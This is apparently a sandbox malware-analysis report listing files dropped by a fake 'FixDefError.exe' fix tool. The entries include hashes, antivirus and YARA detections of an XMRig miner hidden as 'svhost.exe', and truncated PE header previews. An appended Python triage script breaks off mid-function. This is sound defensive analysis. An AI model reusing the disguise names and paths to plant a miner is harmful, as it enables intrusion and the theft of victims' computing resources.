                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}..........."...0..>...........\... ...`....@.. ....................................`..................................\..O....`..............................T\............................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............V..............@..B.................\......H..........................p...........................................~.L..sl.!.A.&.AI.F*.j..c......S...y.....D/..c&........'.<L..n!.\N....)........JR.=.0X..).....qx.Y,~o......k.....Tk0...[..D}.PK...3...........<.%1:<-....|.S.O.-.-9y......pN3|..@...B'....b.n........R.6h.o+..YM.UJ.........MUu5.aO.....5...#.\.t. ~B...q1..U...;~'._s...;8.g..2*..!.F..1....r.E..k(.\...@>sK.C...%....hu.....6Z..).;..x+.....j.z'.S.G.u....T.L@.{.4.5..k...K.$g4.u.o&D7Q..#..N..F4"...
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):154112
                                                                                                                  Entropy (8bit):6.466751742009968
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:F5biAfx1p7t+KJPF0+yxqbl8MBRnZgRKByWu:F5biAfx1l6vxqbqMBRnZgRKBy
                                                                                                                  MD5:DC68A4B4746C67F3D28C9FD958E8EA05
                                                                                                                  SHA1:4E3C8AB2D91FD9831731483B192FFAED142430A3
                                                                                                                  SHA-256:A5ABDD354FCF673AD85A3A9D467B6184F46EF50FC300BA78C8ABABBDCABCA96D
                                                                                                                  SHA-512:4E6D94C3AE09B567EF76BAA392C1E6E0F12615F46CCB9A2116DB7B4B2D304C03E510BAACA03738F540A4E85A0310D69B57A884B98AFCAA8D62E0A3C90F32E832
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%/..........."...0..N...........l... ........@.. ....................................`.................................Tl..W....................................l............................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B.................l......H.......\o...............m..p............................................se7..%.f.fU..h...=k.);....jhE..^.6....W0/.,.CqM..8..]LB..(..$.$...8.Z..IXW.a.a....Q...M......92*.<.V..8Zc.z.5.E.&.x.o.,>..JV.o.....mctp..39../~h.....ca....o>../x...b..4.-YP....R......} .G....*>..M..e..C"d.GL..$.=...}.w.l.9.G.n.a/...t..y)..}<k.!)g...Y.y@K.'4..\u....%i.e...I.......5.z.w.RM....h.j..8|}W#d.........1%U.hbU.=-p.?..Bxz...)..u..Y=F....m...?...s%.k.7[..z.}..9X......Iu...5...la
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14544
                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8294400
                                                                                                                  Entropy (8bit):6.635462046124321
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:GeSdMeEZvlEVuaMYPShvXAaiW5DjocFtZLj2XMSpZVqWyOmsqndFt3BQgEBHQ+zJ:NflEiI9Wt3YLkqpnmNK/ysxfWdIjF
                                                                                                                  MD5:B38D28CCCACAC85A62AEF15D993449DD
                                                                                                                  SHA1:F65D87F2185AD06E1057842B49C2E9F897D37CF9
                                                                                                                  SHA-256:DA528001CA247AABB5D6ED30187E3F85661663C3B00B3BC85A932CD2066251BB
                                                                                                                  SHA-512:836C6F59EEA640A9355AD7066A2F810437C7CAA6D429575F66245D756B0058AA43976478FF2000366D034BC1D2E2E256927E82F0EEB738E795DB62393C130620
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Florian Roth (Nextron Systems)
                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Florian Roth (Nextron Systems)
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: ditekSHen
                                                                                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: unknown
                                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: unknown
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ZLb...............&.._...~................@...................................F9....`... .................................................E...P........w..............`.............................. .u.(...................................................text....._......._.................`..`.data...`....._......._.............@....rdata.. I....`..J....`.............@..@.pdata........w.......w.............@..@.xdata.......z.......y.............@..@.bss....`.2...}..........................idata...E......F....}.............@....CRT....h....0........}.............@....tls.........@........}.............@....rsrc........P........}.............@....reloc.......`........~.............@..B........................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4096
                                                                                                                  Entropy (8bit):1.0712517987358952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:EDrwXqy6q9995nynllTk56GWtbgjO3s7Sk56GYrH:ak68qllTGtm2SGtEH
                                                                                                                  MD5:6941A631A897376575E236889F046FBF
                                                                                                                  SHA1:265FB5BEB5E26513735F508677E726419B3862D4
                                                                                                                  SHA-256:7B78D45B96B7523F4829142025DC9E84A7FAF4323327E08FAC1B4F5767669F04
                                                                                                                  SHA-512:A476DF911ECEF1CFEEF022D1B379FBA974A71F46645E0F123B46384039E401F1800EA754174422E7F0A281DC45851DD2B3F4CFDD5BA339DD8E8C65AB2A6A5953
                                                                                                                  Malicious:false
                                                                                                                  Preview:................................................................................X...X...c.A.2Z...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....c.A.2Z..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.X...X...c.A.2Z..................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4096
                                                                                                                  Entropy (8bit):1.0712517987358952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:EDrwXqy6q9995nynllTk56GWtbgjO3s7Sk56GYrH:ak68qllTGtm2SGtEH
                                                                                                                  MD5:6941A631A897376575E236889F046FBF
                                                                                                                  SHA1:265FB5BEB5E26513735F508677E726419B3862D4
                                                                                                                  SHA-256:7B78D45B96B7523F4829142025DC9E84A7FAF4323327E08FAC1B4F5767669F04
                                                                                                                  SHA-512:A476DF911ECEF1CFEEF022D1B379FBA974A71F46645E0F123B46384039E401F1800EA754174422E7F0A281DC45851DD2B3F4CFDD5BA339DD8E8C65AB2A6A5953
                                                                                                                  Malicious:false
                                                                                                                  Preview:................................................................................X...X...c.A.2Z...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....c.A.2Z..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.X...X...c.A.2Z..................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1119
                                                                                                                  Entropy (8bit):5.356708753875314
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4Ks29E4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzd
                                                                                                                  MD5:12BC6A423CB11584DBBB3264AE68E0CE
                                                                                                                  SHA1:DE1E6954FF5E326226AD5469C3F1F0AC9E41C461
                                                                                                                  SHA-256:3592978914563991F47FFE8DDBBDC9CAAAD2B31F530335F17277192231015D6A
                                                                                                                  SHA-512:AF328D01DFD1B3733A0746A0C313A00FAF40CD02A5710BB40C17088C7F02D7E83B2C176C794ACD54BEEDDA2910D7DBDFB4DACC9282F19988D1271E2C805AB675
                                                                                                                  Malicious:true
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):1211
                                                                                                                  Entropy (8bit):5.349329844867972
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzE
                                                                                                                  MD5:01E8E56005273B0ECADB5A7F9D85DC09
                                                                                                                  SHA1:B96A534655E4506577313F8B6DE0CB1A79AC0506
                                                                                                                  SHA-256:7BA9385539AD5F701511668619265113287F5292BBB2D50A3193C7565EB0CA96
                                                                                                                  SHA-512:A906F7CB6E346ADAE80116287725DF37C7E57AAF65DE82DC571907AFC86D5C36CC3EF317CB1ED82CD5C906F24BB3A8EDCABA8371D909EFF4A48CEC2FF23088D3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10434
                                                                                                                  Entropy (8bit):4.94012526707092
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Xxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smcSydcU6Cazpo:6BVoGIpN6KQkj2Wkjh4iUxQedNYoGibY
                                                                                                                  MD5:8C18848AE92C662B40A42CFF5982C50A
                                                                                                                  SHA1:B1E5B9D40A279A48D883EB460BD7CD78CDC7416F
                                                                                                                  SHA-256:66799228E6C44EBFEBD6AFAF15DF5894A5BEB2B8CAE365C88BCA10DE5ACE0D90
                                                                                                                  SHA-512:1DC92D1940C9976CC991FED360BF18D2FD01B2237B1613869A9B0357EBAC51EA0DE7C0B3B3254F5A90CDA6EA99621501DFAB08D8FD81FF2E9792FBBEC8D0191E
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22136
                                                                                                                  Entropy (8bit):5.574336755690247
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:utCRq0x3eVaaQUA0Rbr+RnY4xnRbBqRmQQoSLjc1naRLhWbcYg9DrdFIlrBWI+iv:53cQBoAY4xRdqRmQzOqa3C72kw7S
                                                                                                                  MD5:880CD6909D7CAF2777E03D0386CF4C24
                                                                                                                  SHA1:2DA8A0A8B806F833AA3AE7799AB17EC6D8C1A5DE
                                                                                                                  SHA-256:9EE8DDC3BB664EB372595DEB794F8730FE90FED1E5C6BEA6136BFA8C6A399F04
                                                                                                                  SHA-512:20B907778B45121F106059B8A0C587C7AEDB27FF2DF1E28EFFB28AED840DE4B01077827832A07DDFAA549426CB50206F360486A9DFF73974CC839294F7C8FD13
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........W.........)...........,..............@..........H...............<@.^.L."My...:/..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11008348563804743
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:26YLeTXm/Ey6q9995neNq3qQ10nMCldimE8eawHjc0HP:26TKl683LyMCldzE9BHjciP
                                                                                                                  MD5:69A1E51487EAE089A78B27364EA05DC8
                                                                                                                  SHA1:2AF103FB0AD1E6C928C23DD9D9E03263E95DDCB5
                                                                                                                  SHA-256:6BC5E78B78908B9A995E7E9558D5E24E0E0B4BEEA112E08378E2E72B539748BB
                                                                                                                  SHA-512:41FBF2BBB2E4774C34D6E68CC732246209C4A12F0885DF6AE1170C0DD5BE99E6A45CF06E4983F96C5E4A71278E418B1C96833250F3BD67240F352D744EF1438B
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......d.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ........2Z..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....4.....d....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11255444863100625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:wXjXm/Ey6q9995ncdg1miM3qQ10nMCldimE8eawHza1miIo6P:bl68mS1tMLyMCldzE9BHza1tID
                                                                                                                  MD5:E2A96493082A5B2A7C530DF69F5B50AB
                                                                                                                  SHA1:C567BCC50C8C07C1479176ED212B4DB86B742C8E
                                                                                                                  SHA-256:F2DD43F2FE995FAA2514861FE04B6176DE7D556FEF5CCF6C0E44B443599FCA1F
                                                                                                                  SHA-512:847C43303679F99E878D2A7C3E2B34EFC52EBD2C95FBE83A249E1976EFFE983C43D29153E493A6C81FCCA17F136D0BE1B9AB4117D05A7BB674A93B73167B5307
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4....,.c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....3h;.2Z..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....4....4.c....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11226972425315478
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:w1jXm/Ey6q9995nu71mK2P3qQ10nMCldimE8eawHza1mKEAP:Fl68c1iPLyMCldzE9BHza15
                                                                                                                  MD5:BFA1B44C4A3CBB0FEB152699F2DC21FB
                                                                                                                  SHA1:71BAF7F8B7783D12ADFEC56A9FA929D3C96EEF6F
                                                                                                                  SHA-256:B1A1A8CDA1F994C157D45AB1A53938267B9BFED4028E07B798CA7163F0F5016E
                                                                                                                  SHA-512:3FF1FFB4C15A895E7C7912AA4FD675A5E1CE9184BE7CE42E53D65405C30B39E134C789E94856CD73C13C45D849A072BB090FCD140D9E5D1E615A52EE1B1C8D07
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ......i..2Z..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....4......c....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):471552
                                                                                                                  Entropy (8bit):7.74633642850456
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:7Pu1GphsJNnK2PoiC7FMUxvuB150WBuYpIEnHVk6hGO/FNcJv9qPs2w85KmdMd:VsbKaoiYFjvuf504dVk6C
                                                                                                                  MD5:0326F45523014399DEA91452C957B5E0
                                                                                                                  SHA1:47A4B2F2C8AFDB5EFBAD429F2EA3485B3752EC45
                                                                                                                  SHA-256:1A3DB0001B52CB3F6E16C45FC2D4D70FC3706B421A9B2B5006172026C60D84D7
                                                                                                                  SHA-512:2AA4B7AF945A936B16405A125FEE48C998DD42B8423F7CD56B5B49E7D270786D23D359729FB7E7DD212369AAAAB98C3E444F05C902F1C1E15416F7828AD21B42
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.O..........."...0..&..........>E... ...`....@.. ....................................`..................................D..W....`...............................D............................................... ............... ..H............text...D%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B................ E......H........-..............T,..p...............................................f.L.,........D{.q5h...v.........#!...W..b3..T...-.....k\.L-uj.@...ro..P.q.K...~-e...Jh.kV-t..+F..S..E..6.a...r$z.O.K......R...@.aC..V...2...e4P.A..3..yL....OP#4m.l2M2..T....2..q.$..Q)..-3......+o...?L.........H.$%nNo.k.-.|....V._..O....lZE.oPz$"o..............U7....Y...x. .5O....#.,4...u(...>.i..w..~.]..........1..E:......i..d.r.L=.}.h....X.....W.......z..d..N.O-Pmh.......!6L?.!.X....
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1
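The records above are flattened "Key:Value" lines, which makes them awkward to triage by eye: the two one-byte files written by powershell.exe carry the well-known hashes of the literal string "1" and are noise, while the PE32 .NET assembly dropped by FixDefError.exe (entropy 7.75, Malicious:true, three engine detections) is the artifact worth pulling from the sandbox. The following is an added example, not Joe Sandbox code: it parses records in this layout, recomputes the hashes and the 8-bit Shannon entropy the report prints so a file pulled from disk can be matched to its record, and applies a few triage rules. The two sample records are copied from this page with their Preview fields shortened; the 7.0 entropy threshold is an assumed triage setting, not something the report defines.

```python
"""Parse and triage flattened 'Dropped Files' records from a sandbox report.
Added example for this page; the parsing rules follow the Key:Value layout
shown above and are not part of Joe Sandbox itself."""
import hashlib
import math
import re
from collections import Counter

# Two records copied from the page (Preview shortened). A record starts at
# each 'Process:' line; the '• Antivirus: ...' bullets belong to the record
# whose 'Antivirus:' field precedes them.
SAMPLE_RECORDS = """\
Process:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Malicious:false
Preview:1
Process:C:\\Users\\user\\Desktop\\FixDefError.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):471552
Entropy (8bit):7.74633642850456
Encrypted:false
MD5:0326F45523014399DEA91452C957B5E0
SHA1:47A4B2F2C8AFDB5EFBAD429F2EA3485B3752EC45
SHA-256:1A3DB0001B52CB3F6E16C45FC2D4D70FC3706B421A9B2B5006172026C60D84D7
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 31%
Preview:MZ......................@.......
"""

AV_LINE = re.compile(r"• Antivirus:\s*(.+?),\s*Detection:\s*(\d+)%")
ENTROPY_PACKED = 7.0  # assumed threshold: above this a PE is likely packed/encrypted


def parse_records(text):
    """Split flattened report text into one dict per dropped file."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        av = AV_LINE.match(line)
        if av:
            if records:
                records[-1].setdefault("av", []).append((av.group(1), int(av.group(2))))
            continue
        key, sep, value = line.partition(":")  # first colon only; paths keep 'C:'
        if not sep:
            continue
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value.strip()
    return records


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def fingerprint(data):
    """Hashes and entropy in the same form the report prints them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
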